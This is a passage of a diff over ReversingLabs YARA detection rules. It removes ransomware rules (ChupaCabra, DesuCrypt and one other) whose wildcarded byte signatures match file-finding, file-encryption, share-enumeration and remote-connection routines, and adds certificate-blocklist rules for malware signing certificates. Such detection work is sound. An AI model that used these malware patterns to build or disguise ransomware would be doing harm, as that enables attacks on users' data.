-            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0
-            EB ?? 1B C0 83 D8 ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 8D 47 ?? 50 8B 07 50 53 68 ??
-            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 55 ?? 57 52 FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? EB ?? C7 45 ?? ?? ?? ??
-            ?? 8B 0D ?? ?? ?? ?? 57 6A ?? 51 FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? 8B 15
-            ?? ?? ?? ?? 53 6A ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ??
-            ?? ?? ?? 5B 8B E5 5D C3
-        }
-		$remote_connection_p1 = {
-            55 8B EC 83 EC ?? 53 33 DB 8D 45 ?? 89 5D ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8B 45 ?? 8B 4D ?? 56 57 50 51 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 8B 55 ?? 8B
-            4D ?? 52 57 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 8B 45 ?? 6A
-            ?? 50 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ??
-            C7 45 ?? ?? ?? ?? ?? 56 FF D3 8D 4D ?? 51 8D 55 ?? 52 6A ?? 57 C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 85 F6 74 ?? 8B 45 ?? 50 FF D3
-            8B 5D ?? 83 7D ?? ?? 8B 35 ?? ?? ?? ?? 74 ?? 8B 4D ?? 8B 15 ?? ?? ?? ?? 51 6A ?? 52
-            FF D6 8B 45 ?? 85 C0 74 ?? 50 A1 ?? ?? ?? ?? 6A ?? 50 FF D6 5F 5E 8B C3 5B 8B E5 5D
-            C3 8B C3 5B 8B E5 5D C3
-        }
-		$remote_connection_p2 = {
-            55 8B EC 83 EC ?? 56 57 68 ?? ?? ?? ?? 33 FF 57 57 57 57 FF 15 ?? ?? ?? ?? 8B F0 85
-            F6 74 ?? 8B 3D ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 89 45 ?? 89 45 ?? 8D 45 ?? 50 6A ??
-            56 C7 45 ?? ?? ?? ?? ?? FF D7 6A ?? 8D 4D ?? 51 6A ?? 56 FF D7 6A ?? 8D 55 ?? 52 6A
-            ?? 56 FF D7 8B 45 ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 51 56 FF 15 ?? ?? ??
-            ?? 8B F8 85 FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 5F 5E 8B E5 5D C3
-        }
-		$remote_connection_p3 = {
-            55 8B EC 83 EC ?? 53 56 8B F0 33 C0 89 06 57 89 46 ?? 89 46 ?? 6A ?? 50 89 46 ?? 8D
-            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 51 6A ?? BF ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 89 7D ?? 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B 4D ?? 8B 1D ?? ?? ?? ?? 8D 4C 09 ?? 33 C0 85 C9 74 ?? 8B 15 ?? ?? ?? ??
-            51 50 52 FF D3 89 06 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 50 E8 ?? ?? ??
-            ?? 8B 06 8B 55 ?? 33 C9 66 89 0C 50 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 66 83 38
-            ?? 75 ?? 83 45 ?? ?? 2B CF 89 4D ?? 85 C9 75 ?? 8B 55 ?? 8D 7C 0A ?? 8D 54 3F ?? 33
-            C0 85 D2 74 ?? 52 50 A1 ?? ?? ?? ?? 50 FF D3 8B 4D ?? 89 46 ?? 85 C0 74 ?? 51 8B 4D
-            ?? 51 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 4E ?? 52 8B 55 ?? 50 8D 44 51
-            ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? B9 ?? ?? ?? ?? 66 89 08 33 D2 66 89 14 78 66 8B 45 ??
-            83 C4 ?? 83 7D ?? ?? 66 89 46 ?? 75 ?? 83 4E ?? ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D
-            C3 8B 36 85 F6 74 ?? 8B 0D ?? ?? ?? ?? 56 6A ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B
-            8B E5 5D C3
-        }
-		$encrypt_files_1 = {
-            8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 57 8B F8 8D 4C 3F ?? 33
-            C0 85 C9 74 ?? 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8B F0 8B CB
-            2B F3 8D 9B ?? ?? ?? ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? B9 ?? ?? ?? ??
-            8D 34 3F 2B F1 03 F0 EB ?? 8D 49 ?? 0F B7 11 66 89 14 0E 83 C1 ?? 66 85 D2 75 ?? 5E
-            5F C3
-        }
-		$encrypt_files_2 = {
-            83 E8 ?? 53 56 57 8B DA 74 ?? 48 74 ?? 5F 5E 33 C0 5B C3 53 51 33 F6 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33 FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ??
-            85 C0 74 ?? BF ?? ?? ?? ?? A1 ?? ?? ?? ?? 56 6A ?? 50 FF 15 ?? ?? ?? ?? 8B F7 5F 8B
-            C6 5E 5B C3 53 51 33 F6 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B F0 33
-            FF 85 F6 74 ?? 56 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? 8B 0D ?? ?? ?? ??
-            56 6A ?? 51 FF 15 ?? ?? ?? ?? 8B F7 5F 8B C6 5E 5B C3 ?? ?? 55 8B EC 8B 4D ?? 8B 41
-            ?? 83 F8 ?? 0F 8F ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 40 53 89 41 ??
-            8B 45 ?? 83 E8 ?? 56 57 74 ?? 48 0F 85 ?? ?? ?? ?? 8B 7D ?? 33 F6 8D 9B ?? ?? ?? ??
-            8B 86 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 83
-            FE ?? 72 ?? 8B 5D ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B 4D ?? 51 56 E8 ?? ?? ?? ??
-            83 C4 ?? EB ?? 8B 41 ?? 83 E8 ?? 74 ?? 48 75 ?? 8B 75 ?? E8 ?? ?? ?? ?? EB ?? 8B 75
-            ?? 8B C6 E8 ?? ?? ?? ?? F7 D8 1B C0 F7 D8 85 C0 74 ?? 8B 5D ?? 8B FE E8 ?? ?? ?? ??
-            8B F0 85 F6 74 ?? 8B 7D ?? 8B 47 ?? 8B 0F 8B D6 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 47 ??
-            85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 45 ?? FF 48 ?? 5F 5E 5B B8
-            ?? ?? ?? ?? 5D C3
-        }
-		$encrypt_files_3 = {
-            8B C6 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 C0 ?? 85 C0 7E ?? EB
-            ?? 8D 49 ?? 66 83 3C 46 ?? 74 ?? 48 85 C0 7F ?? 33 C0 C3 8D 44 46 ?? 85 C0 74 ?? 83
-            C0 ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jiang Liu" and pe.signatures [ i ] . serial == "38:79:82:60:5e:54:2d:6d:52:f2:31:ca:6f:56:57:cc" and 1475884800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Chupacabra : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_E0134C41E7Eda6863C4Eee5B003976Dd : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ChupaCabra ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e44a101d-53c3-51f2-84ca-f6a5858c169b"
-		date = "2021-10-12"
-		modified = "2021-10-12"
+		id = "395c14fd-2fec-53ad-bc8e-2dd4bb3522d2"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.ChupaCabra.yara#L1-L90"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14674-L14692"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7f247778e0bd8057670abf42b2d1011ebae891ffcb21ebad50060f9a7986bf93"
+		logic_hash = "fbe34baf52e3fa7d7cdfcfaef9b8851c4cbeb46d17eeade61750e59cf0c13291"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ChupaCabra"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 14 0A 14 0B 7E ?? ?? ?? ?? 7E ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 73 ?? ?? ?? ?? 13 ?? 73 ??
-            ?? ?? ?? 0A 06 08 06 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 11 ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11
-            ?? 11 ?? 16 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 0B DE
-            ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ??
-            11 ?? 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 07 2A
-        }
-		$encrypt_files_p2 = {
-            02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 0A 02 06 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ??
-            ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ?? ?? 8D ?? ??
-            ?? ?? 0B 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 0D 09 07 09 8E 69 28 ?? ?? ?? ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 19 28
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 07 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
-            ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 02 28
-            ?? ?? ?? ?? 13 ?? 11 ?? 17 5F 17 33 ?? 11 ?? 17 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ??
-            ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ??
-            ?? 8D ?? ?? ?? ?? 13 ?? 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 19 28
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
-            ?? ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 26 DE ??
-            2A
-        }
-		$find_files_p1 = {
-            02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 16 0C 2B ?? 06 08 9A 28 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 08 9A 28 ?? ?? ?? ?? 08 17 58 0C 08 06 8E 69 32 ?? 16 0D
-            2B ?? 07 09 9A 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69 32 ?? DE ?? 26 DE ?? 2A
-        }
-		$find_files_p2 = {
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
-            ?? 1F ?? 8D ?? ?? ?? ?? 25 16 1E 28 ?? ?? ?? ?? A2 25 17 1F ?? 28 ?? ?? ?? ?? A2 25 18
-            1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28 ?? ?? ?? ?? A2 25
-            1B 1B 28 ?? ?? ?? ?? A2 25 1C 1C 28 ?? ?? ?? ?? A2 25 1D 1F ?? 28 ?? ?? ?? ?? A2 25 1E
-            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ??
-            A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1B 28 ??
-            ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ??
-            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ??
-            A2 0A 16 0B 2B ?? 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? 2A
-        }
-		$drop_ransom_note = {
-            7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ??
-            ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E
-            ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ??
-            ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 26 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 26 73 ?? ?? ?? ?? 0A 7E ?? ?? ?? ?? 0B 06 07 6F ?? ?? ?? ?? 26 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5000 LIMITED" and ( pe.signatures [ i ] . serial == "00:e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd" or pe.signatures [ i ] . serial == "e0:13:4c:41:e7:ed:a6:86:3c:4e:ee:5b:00:39:76:dd" ) and 1528070400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Desucrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5B47A4739Dd8Ffe81D9B5307 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DesuCrypt ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b9b3ce2b-f184-5bfa-8e1c-a7b996ac708a"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "9688b091-9a77-59c2-b7f9-a8b652201b8f"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DesuCrypt.yara#L1-L93"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L14694-L14710"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bd3ba8ea0fc16aad859a73628d0eda180d49298162fe239acf81c7c4e371eaad"
+		logic_hash = "5f35f520d4af26fa648553894a5b0db043d0c32302d94f531b6cb48691396a92"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DesuCrypt"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
-            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
-            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
-            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
-            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
-            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
-            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
-            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
-            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
-            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
-            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
-            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
-            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
-            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
-            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
-            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
-            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
-        }
-		$encrypt_files = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 8B D9 89 54 24 ?? B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? BE ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? F3 A5 6A ?? 6A ?? 8D
-            44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 66 A5 50 6A ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B
-            E5 5D C3 8D 44 24 ?? 50 8D 44 24 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? 8D 84 24 ??
-            ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ??
-            ?? ?? EB ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 5F
-            5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 8D 44 24 ?? 50 FF 74 24
-            ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 8B 43 ?? 8B 3D ?? ?? ?? ?? 50 89 44 24 ?? 89 44 24 ?? 8D 44 24 ??
-            50 6A ?? 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 75 ?? FF 15 ?? ?? ?? ?? 50 51 BA
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 33 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-            FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 83 7B ?? ?? 72 ?? 8B 1B FF 74 24 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? FF
-            74 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF 74 24 ?? FF D7 85 C0 0F 84 ?? ?? ?? ?? 8B 4C 24
-            ?? 8B 44 24 ?? 5F 89 01 8B C6 8B 8C 24 ?? ?? ?? ?? 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5
-            5D C3
-        }
-		$enum_shares = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 89 75 ?? 8B 45 ?? 8D 4D ?? 51 50
-            6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ??
-            ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            0F 1F 40 ?? 33 DB 39 5D ?? 0F 8E ?? ?? ?? ?? 83 C7 ?? 66 90 F7 47 ?? ?? ?? ?? ?? 74
-            ?? 8D 47 ?? 89 45 ?? 8B 06 8B 48 ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8D 55 ?? 52 FF 50
-            ?? E9 ?? ?? ?? ?? 8B 17 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8D 70 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C6 D1 F8 83 F8 ?? 77 ?? 8D 34 00
-            89 45 ?? 56 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 44 35 ?? EB ?? 52 C6
-            45 ?? ?? 8D 4D ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ??
-            50 8B 4E ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 83 C7 ??
-            3B 5D ?? 0F 8C ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 57 8D 45 ?? C7
-            45 ?? ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 FF 15 ??
-            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D
-            ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files and $encrypt_files and $enum_shares )
